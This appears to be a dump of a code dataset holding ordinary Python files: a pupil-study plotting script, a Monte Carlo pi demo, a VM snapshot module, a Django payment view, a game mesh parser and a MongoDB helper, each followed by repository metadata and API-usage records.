# boxes
gap_offsets = np.array([0] * 4 + [gaps[kk]] * 2)
stim_t = stim_times + gap_offsets
box_x = np.r_[stim_t, stim_t[2:]]
box_y = np.array([stim_ymax] * 6 + [stim_ymin] * 4)
box_u = np.array([thk] * 10)
box_d = np.array([thk] * 10)
# colors must be tuples (not hex strings) for alpha to work
box_c = [cc.to_rgba(x) for x in [cue] * 2 + [msk] * 8]
if jj == 1:
box_u[4:6] *= (1 - kk) + 0.5
box_u[8:] *= (1 - kk) + 0.5
box_d[4:6] *= kk
box_d[8:] *= kk
box_c[4:6] = [cc.to_rgba(linecol)] * 2 # or tcol
box_c[8:] = [cc.to_rgba(linecol)] * 2
if not kk:
indices = np.array([4, 5, 8, 9])
box_x = box_x[indices]
box_y = box_y[indices]
box_u = box_u[indices]
box_d = box_d[indices]
box_c = np.array(box_c)[indices]
if jj == 1 or kk:
for x, y, c, u, d in zip(box_x, box_y, box_c, box_u, box_d):
c = cc.to_rgba_array(c)
ax.fill_between((x, x+stim_dur), y+u, y-d, color=c,
edgecolor='none', zorder=9)
# timecourse labels
xtxt = [-0.1, -0.1, 4.4][jj]
ytxt = [[0.09, 0.075], [0.09, 0.075],
[stim_ymax, stim_ymin]][jj][kk]
xytxt = [(0, 0), (0, 0), (5, 0)][jj]
_ = ax.annotate(labels[kk], (xtxt, ytxt), xytext=xytxt,
textcoords='offset points', color=linecol,
ha='left', va='center', fontsize=9)
# cue label
_ = ax.annotate('cue', xy=(stim_times[1], stim_ymax + thk),
xytext=(0, 1.5), textcoords='offset points',
fontsize=9, fontstyle='italic', ha='center',
va='bottom', color='0.5')
# stats
if plot_signif:
thresh = -1 * distributions.t.ppf(0.05 / 2, len(contr_diff) - 1)
result = spatio_temporal_cluster_1samp_test(
contr_diff, threshold=thresh, stat_fun=stat_fun, n_jobs=6,
buffer_size=None, n_permutations=np.inf)
tvals, clusters, cluster_pvals, H0 = result
signif = np.where(np.array([p <= 0.05 for p in cluster_pvals]))[0]
signif_clusters = [clusters[s] for s in signif]
signif_cluster_pvals = cluster_pvals[signif]
# we only need x[0] in clusters because this is 1-D data; x[1] in
# clusters is just a list of all zeros (no spatial connectivity).
# All the hacky conversions to float, int, and list are because
# yaml doesn't understand numpy dtypes.
pupil_signifs = dict(thresh=float(thresh),
n_clusters=len(clusters),
clusters=[[int(y) for y in x[0]]
for x in clusters],
tvals=tvals.tolist(),
pvals=cluster_pvals.tolist())
label = '_vs_'.join([l.replace(' ', '-') for l in labels])
fname = 'voc_cluster_signifs_{}.yaml'.format(label)
with open(op.join(out_dir, fname), 'w') as f:
yaml.dump(pupil_signifs, stream=f)
# plot stats
for clu, pv in zip(signif_clusters, signif_cluster_pvals):
'''
# this index tells direction of tval, hence could be used to
# decide which color to draw the significant cluster region
# based on which curve is higher:
idx = (np.sign(tvals[clu[0][0], 0]).astype(int) + 1) // 2
'''
clu = clu[0]
cluster_ymin = ylim[0] * np.ones_like(t[clu])
cluster_ymax = np.max(contr_mean[:, clu], axis=0) # under top
pval_x = t[int(np.mean(clu[[0, -1]]))]
pval_y = -0.1 * ylim[1]
pval_ord = np.trunc(np.log10(pv)).astype(int)
hatch_between(ax, 9, t[clu], cluster_ymin,
cluster_ymax, linewidth=1.25,
color=signifcol, zorder=1)
if show_pval:
pval_txt = '$p < 10^{{{}}}$'.format(pval_ord)
ax.text(pval_x, pval_y, pval_txt, ha='center',
va='baseline', fontdict=dict(size=10))
# vertical lines
if len(signif):
for ix in (0, -1):
ax.plot((t[clu][ix], t[clu][ix]),
(cluster_ymin[ix], cluster_ymax[ix]),
linestyle=':', color=axiscol, linewidth=1)
# set axis limits
xlim[1] = 1.001 * xlim[1]
ylim[1] = 1.001 * ylim[1]
ax.set_ylim(*ylim)
ax.set_xlim(*xlim)
ax.xaxis.set_ticks(np.arange(np.ceil(xlim[1])))
# remove yaxis / ticks / ticklabels near bottom
ytck = [-0.1 * ymax, 1.001 * ymax]
ytl = ax.yaxis.get_ticklocs()
ax.spines['left'].set_bounds(*ytck)
for sp in ['left', 'bottom']:
ax.spines[sp].set_color(axiscol)
ax.yaxis.set_ticks(ytl[ytl > ytck[0]])
ax.set_ylim(*ylim) # have to do this twice
ax.tick_params(color=tickcol, width=0.5, labelcolor=ticklabcol)
# annotations
yl = u'“Effort” (a.u.)' if use_deconv else 'Pupil size (z-score)'
yo = 1 - np.diff(ytck) / np.diff(ylim) / 2.
ax.set_ylabel(yl, y=yo, color=axislabcol)
ax.set_xlabel('Time (s)', color=axislabcol)
box_off(ax, ax_linewidth=0.5)
ax.patch.set_facecolor('none')
# fig.tight_layout(w_pad=2., rect=(0.02, 0, 1, 1))
fig.tight_layout()
fig.text(0.01, 0.98, 'a)')
fig.text(0.01, 0.66, 'b)')
fig.text(0.01, 0.34, 'c)')
if savefig:
fig.savefig('pupil-fig-voc{}.pdf'.format(perfect_filename))
else:
plt.ion()
plt.show()
if only_perfect:
df = DataFrame.from_dict(n_perfect_trials, orient='index')
df.to_csv(op.join(out_dir, 'voc_perfect_trials.csv'))
| LABSN-pubs/2017-JASA-pupil-attn-switch | figures/fig-pupil-voc.py | fig-pupil-voc.py | py | 14,529 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "matplotlib.pyplot.ioff",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 26,
"usage_type": "name"
},
{
"api_name": "convenience_functions.use_font",
"line_number": 27,
"usage_type": "call"
},
{
"api_name"... |
71534618024 | #!/usr/bin/python3
# -*- coding: utf-8 -*-
import matplotlib.pyplot as plt
from random import *
import math
def get_random_coordinates():
return random(), random()
def draw_circle():
center = (0, 0)
radius = 1
circle = plt.Circle(center, radius, fill=False, ec='b')
a = plt.axes(xlim=(-1.2, 1.2), ylim=(-1.2, 1.2))
a.add_patch(circle)
a.set_aspect('equal')
plt.grid(True)
def main():
data = []
gen_cnt = 100000
inside_cnt = 0
for i in range(gen_cnt):
x, y = get_random_coordinates()
data.append((x, y))
xy_pow_sum = math.pow(x, 2) + math.pow(y, 2)
if xy_pow_sum <= 1:
inside_cnt += 1
xs, ys = zip(*data)
draw_circle()
plt.scatter(xs, ys)
plt.grid(True)
plt.show()
print("Div: {} (Expected: {})".format(str(inside_cnt/gen_cnt), math.pi/4))
if __name__ == '__main__':
main()
| Dry8r3aD/monteCarloSimulation | run.py | run.py | py | 912 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "matplotlib.pyplot.Circle",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.axes",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "mat... |
6663058248 | import os
from datetime import datetime
from univention.lib.i18n import Translation
from univention.management.console.config import ucr
from univention.management.console.modules import Base, UMC_OptionTypeError, UMC_OptionMissing, UMC_CommandError
from univention.management.console.log import MODULE
from univention.management.console.protocol.definitions import MODULE_ERR_COMMAND_FAILED
from univention.uvmm.protocol import Data_Domain, Disk, Graphic, Interface
# for urlparse extensions
from univention.uvmm import helpers
import urlparse
from notifier import Callback
_ = Translation( 'univention-management-console-modules-uvmm' ).translate
class Snapshots( object ):
def snapshot_query( self, request ):
"""Returns a list of snapshots of a domain
options: { 'domainURI': <domain URI> }
return: [ { 'id' : <snapshot name>, 'label' : <snapshot name>, 'time' : <creation time> }, ... ]
"""
self.required_options( request, 'domainURI' )
def _finished( thread, result, request ):
if self._check_thread_error( thread, result, request ):
return
node_uri, domain_uuid = urlparse.urldefrag( request.options[ 'domainURI' ] )
success, data = result
if success:
snapshot_list = []
if success and data.snapshots is not None:
for name, info in data.snapshots.items():
creation = datetime.fromtimestamp( info.ctime )
snapshot = { 'id' : name, 'label' : name, 'time' : creation.strftime( "%x %X" ) }
snapshot_list.append( snapshot )
self.finished( request.id, snapshot_list )
else:
self.finished( request.id, None, message = str( data ), status = MODULE_ERR_COMMAND_FAILED )
node_uri, domain_uuid = urlparse.urldefrag( request.options[ 'domainURI' ] )
self.uvmm.send( 'DOMAIN_INFO', Callback( _finished, request ), uri = node_uri, domain = domain_uuid )
def snapshot_create( self, request ):
"""Create a snapshot for a domain
options: { 'domainURI': <domain URI>. 'snapshotName' : <snapshot name> }
return: { 'success' : (True|False), 'data' : <details> }
"""
self.required_options( request, 'domainURI', 'snapshotName' )
node_uri, domain_uuid = urlparse.urldefrag( request.options[ 'domainURI' ] )
self.uvmm.send( 'DOMAIN_SNAPSHOT_CREATE', Callback( self._thread_finish, request ), uri = node_uri, domain = domain_uuid, snapshot = request.options[ 'snapshotName' ] )
def snapshot_remove( self, request ):
"""Returns a list of snapshots of a domain
options: { 'domainURI': <domain URI>. 'name' : <snapshot name> }
return: { 'success' : (True|False), 'data' : <details> }
"""
self.required_options( request, 'domainURI', 'snapshotName' )
node_uri, domain_uuid = urlparse.urldefrag( request.options[ 'domainURI' ] )
self.uvmm.send( 'DOMAIN_SNAPSHOT_DELETE', Callback( self._thread_finish, request ), uri = node_uri, domain = domain_uuid, snapshot = request.options[ 'snapshotName' ] )
def snapshot_revert( self, request ):
"""Returns a list of snapshots of a domain
options: { 'domainURI': <domain URI>. 'snapshotName' : <snapshot name> }
return:
"""
self.required_options( request, 'domainURI', 'snapshotName' )
node_uri, domain_uuid = urlparse.urldefrag( request.options[ 'domainURI' ] )
self.uvmm.send( 'DOMAIN_SNAPSHOT_REVERT', Callback( self._thread_finish, request ), uri = node_uri, domain = domain_uuid, snapshot = request.options[ 'snapshotName' ] )
| m-narayan/smart | ucs/virtualization/univention-virtual-machine-manager-daemon/umc/python/uvmm/snapshots.py | snapshots.py | py | 3,398 | python | en | code | 9 | github-code | 36 | [
{
"api_name": "univention.lib.i18n.Translation",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "urlparse.urldefrag",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "datetime.datetime.fromtimestamp",
"line_number": 41,
"usage_type": "call"
},
{
... |
36815991792 | from decouple import config
from django.contrib import messages
from django.http import HttpResponse, HttpResponseRedirect, Http404
from django.shortcuts import redirect, render, get_object_or_404
from zeep import Client
from extensions.utils import send_message_api
from home.models import Setting
from order.models import Order
MERCHANT = config('MERCHANT')
client = Client('https://www.zarinpal.com/pg/services/WebGate/wsdl')
amount = 100 # Toman / Required
orderId = 0
description = "توضیحات مربوط به تراکنش را در این قسمت وارد کنید" # Required
email = 'email@example.com' # Optional
mobile = '09022021302' # Optional
CallbackURL = 'http://127.0.0.1:8000/verify/' # Important: need to edit for realy server.
def send_request(request, id):
global orderId
orderId = id
result = client.service.PaymentRequest(MERCHANT, amount, description, email, mobile, CallbackURL)
print(result.Status)
if result.Status == 100:
order = get_object_or_404(Order, id=orderId, user=request.user)
if order.status != "OnPay":
raise Http404("سفارش شما منقضی شده است. لطفا مجدد سبد خرید را ثبت کنید.")
send_message_api(order.phone,
"سفارش " + str(
order.code) + " در وضعیت پرداخت قرار گرفت لطفا از طریق درگاه بانک خرید خود را تکمیل کنید." + "\n مبلغ سفارش: " + '{:7,.0f}'.format(
order.total) + " تومان")
return HttpResponseRedirect('https://www.zarinpal.com/pg/StartPay/' + str(result.Authority))
else:
return HttpResponse('Error code: ' + str(result.Status))
def verify(request):
if request.GET.get('Status') == 'OK':
order = get_object_or_404(Order, id=orderId, user=request.user)
order.status = "New"
order.save()
result = client.service.PaymentVerification(MERCHANT, request.GET['Authority'], amount)
if result.Status == 100:
messages.success(request,
"\nسفارش شما ثبت شد." + "سریال پرداخت:\n " + str(result.RefID) + "شماره سفارش:\n " + str(
order.code))
send_message_api(order.phone,
"سفارش شما ثبت شد." + " سریال پرداخت:\n " + str(result.RefID) + "شماره سفارش:\n " + str(
order.code))
if Setting.objects.exists(): # send message to admin for new order
setting = Setting.objects.get(pk=1)
send_message_api(setting.phone,
"سفارش جدیدی ثبت شد." + " سریال پرداخت:\n " + str(
result.RefID) + "شماره سفارش:\n " + str(
order.code))
context = {'order': order, 'ref_id': result.RefID}
return render(request, 'order_completed.html', context)
elif result.Status == 101:
messages.error(request,
"\nخطا در پرداخت سفارش." + "کد خطا:\n " + str(result.Status) + "شماره سفارش:\n " + str(
order.code) + "\nاز بخش سفارشات مجدد پرداخت را انجام دهید.")
context = {'order': order,
'ref_id': "خطایی در پرداخت پیش آمده است. لطفا مجدد از بخش سفارشات فاکتور ایجاد شده را پرداخت نمایید."}
return render(request, 'order_completed.html', context)
else:
messages.error(request,
"\nخطا در پرداخت سفارش." + "کد خطا:\n " + str(result.Status) + "شماره سفارش:\n " + str(
order.code) + "\nاز بخش سفارشات مجدد پرداخت را انجام دهید.")
context = {'order': order,
'ref_id': "خطایی در پرداخت پیش آمده است. لطفا مجدد از بخش سفارشات فاکتور ایجاد شده را پرداخت نمایید."}
return render(request, 'order_completed.html', context)
# return HttpResponse('Transaction failed.\nStatus: ' + str(result.Status))
else:
messages.error(request,
"\nخطا در پرداخت سفارش." + "\nاز بخش سفارشات مجدد پرداخت را انجام دهید.")
context = {
'ref_id': "خطایی در پرداخت پیش آمده است. لطفا مجدد از بخش سفارشات فاکتور ایجاد شده را پرداخت نمایید."}
return render(request, 'order_completed.html', context)
# return HttpResponse('Transaction failed or canceled by user')
| amirmovafagh/ecommerce-project-django | payment/views.py | views.py | py | 5,014 | python | fa | code | 0 | github-code | 36 | [
{
"api_name": "decouple.config",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "zeep.Client",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "order.models",
"line_number": 28,
"usage_type": "name"
},
{
"api_name": "django.shortcuts.get_object_... |
18507806058 | """This module store everything connected to a sigular mesh"""
import struct
from typing import BinaryIO
from .offsetstable import OffsetsTable
from .filehelper import FileHelper
class Mesh: # 1_83:
"""A singular mesh"""
# pylint: disable=too-many-instance-attributes,too-many-arguments,too-many-locals
def __init__(
self,
uk: int = 0,
uk2: int = 0,
uk3: int = 0,
uk4: int = 0,
transform_index: int = 0,
uk5: int = 0,
uk6: int = 0,
uk7: int = 0,
uk8: int = 0,
uk9: int = 0,
uk10: int = 0,
weight: float = 0,
uk_index: int = 0,
uk_index2: int = 0,
polys_count: int = 0,
uvs_count: int = 0,
verts_count: int = 0,
uvs_start_index: int = 0,
verts_start_index: int = 0,
polys_start_index: int = 0,
uk11: int = 0,
uk12: int = 0,
):
self.unknown: int = uk
self.unknown2: int = uk2
self.unknown3: int = uk3
self.unknown4: int = uk4
self.transform_index: int = transform_index
self.unknown5: int = uk5
self.unknown6: int = uk6
self.unknown7: int = uk7
self.unknown8: int = uk8
self.unknown9: int = uk9
self.unknown10: int = uk10
self.weight: float = weight
self.uk_index: int = uk_index
self.uk_index2: int = uk_index2
self.polys_count: int = polys_count
self.uvs_count: int = uvs_count
self.verts_count: int = verts_count
self.uvs_start_index: int = uvs_start_index
self.verts_start_index: int = verts_start_index
self.polys_start_index: int = polys_start_index
self.unknown11: int = uk11
self.unknown12: int = uk12
def is_empty(self) -> bool:
if (self.uvs_count == 0) or (self.polys_count == 0) or (self.verts_count == 0):
return True
return False
@staticmethod
def parse_mesh_1_60(
pmd_file: BinaryIO,
offsets_table: OffsetsTable,
table_index: int,
mesh_index: int,
) -> "Mesh":
current_cursor = pmd_file.tell()
pmd_file.seek(offsets_table[table_index].offset + (0x2C * mesh_index) + 0x4)
ti = FileHelper.read_ushort(pmd_file)
pmd_file.seek(offsets_table[table_index].offset + (0x2C * mesh_index) + 0x18)
uvc, vc, pc, uvi, vi, pi = struct.unpack("<2H4L", pmd_file.read(0x14))
mesh = Mesh(
transform_index=ti,
uvs_count=uvc,
verts_count=vc,
polys_count=pc,
uvs_start_index=uvi,
verts_start_index=vi,
polys_start_index=pi,
)
pmd_file.seek(current_cursor)
return mesh
@staticmethod
def parse_mesh_1_82(
pmd_file: BinaryIO,
offsets_table: OffsetsTable,
table_index: int,
mesh_index: int,
) -> "Mesh":
current_cursor = pmd_file.tell()
raise Exception("Unimplemented mesh")
pmd_file.seek(current_cursor)
pass
@staticmethod
def parse_mesh_1_83(
pmd_file: BinaryIO,
offsets_table: OffsetsTable,
table_index: int,
mesh_index: int,
) -> "Mesh":
current_cursor = pmd_file.tell()
pmd_file.seek(offsets_table[table_index].offset + (0x40 * mesh_index))
mesh_data = struct.unpack("<8H3Lf4H6L", pmd_file.read(0x40))
mesh = Mesh(*mesh_data)
pmd_file.seek(current_cursor)
return mesh
@staticmethod
def parse_meshes_1_60(
pmd_file: BinaryIO, offsets_table: OffsetsTable, table_index: int
) -> list["Mesh"]:
meshes: list["Mesh"] = []
meshes_count = int(offsets_table[table_index].size / 44)
for i in range(meshes_count):
meshes.append(Mesh.parse_mesh_1_60(pmd_file, offsets_table, table_index, i))
return meshes
@staticmethod
def parse_meshes_1_82(
pmd_file: BinaryIO, offsets_table: OffsetsTable, table_index: int
) -> list["Mesh"]:
meshes: list["Mesh"] = []
meshes_count = int(offsets_table[table_index].size / 60)
for i in range(meshes_count):
meshes.append(Mesh.parse_mesh_1_82(pmd_file, offsets_table, table_index, i))
return meshes
@staticmethod
def parse_meshes_1_83(
pmd_file: BinaryIO, offsets_table: OffsetsTable, table_index: int
) -> list["Mesh"]:
meshes: list["Mesh"] = []
meshes_count = int(offsets_table[table_index].size / 64)
for i in range(meshes_count):
meshes.append(Mesh.parse_mesh_1_83(pmd_file, offsets_table, table_index, i))
return meshes
| stuntkit/stunt_gp_blender | io_scene_pmd/stunt_gp_model/mesh.py | mesh.py | py | 4,722 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "typing.BinaryIO",
"line_number": 69,
"usage_type": "name"
},
{
"api_name": "offsetstable.OffsetsTable",
"line_number": 70,
"usage_type": "name"
},
{
"api_name": "filehelper.FileHelper.read_ushort",
"line_number": 77,
"usage_type": "call"
},
{
"api_n... |
624223444 | from pymongo import MongoClient
from dotenv import dotenv_values
import urllib.parse
config = dotenv_values(".env")
mongodb_client = MongoClient(config["ATLAS_URI"])
mongo_database = mongodb_client[config["DB_NAME"]]
print(f">>>> Connected to the {config['DB_NAME']} database!")
items_collection = mongo_database[config['DB_COLLECTION']]
terms_collection = mongo_database[config['DB_TERMS_COLLECTION']]
terms_collection.insert_one({'terms': dict()})
def item_helper(item) -> dict:
return {
"id": str(item["_id"]),
"product_name": item["product_name"],
"price": item["price"],
"location": item["location"],
"listed_date": item["listed_date"],
"product_link": item["product_link"],
"product_image": item["product_image"],
"product_search_term": item["product_search_term"]
}
# Retrieve all items present in the database
async def retrieve_items(search_term: str) -> list:
items = []
for item in items_collection.find({'product_search_term': search_term}):
items.append(item_helper(item))
return items
# Add a new item into to the database
async def add_items(items_data: list, search_term: str) -> list:
items = items_collection.insert_many(items_data)
new_items = await retrieve_items(search_term)
return new_items
# Add a new search term into to the database
async def add_search_term(search_term_data: dict) -> dict:
term = terms_collection.update_one(terms_collection.find_one({}),{"$set":{"terms": {**terms_collection.find_one({})['terms'], **search_term_data}}})
return True
| ahmeds26/Evas-Task | server/database.py | database.py | py | 1,628 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "dotenv.dotenv_values",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "pymongo.MongoClient",
"line_number": 10,
"usage_type": "call"
}
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.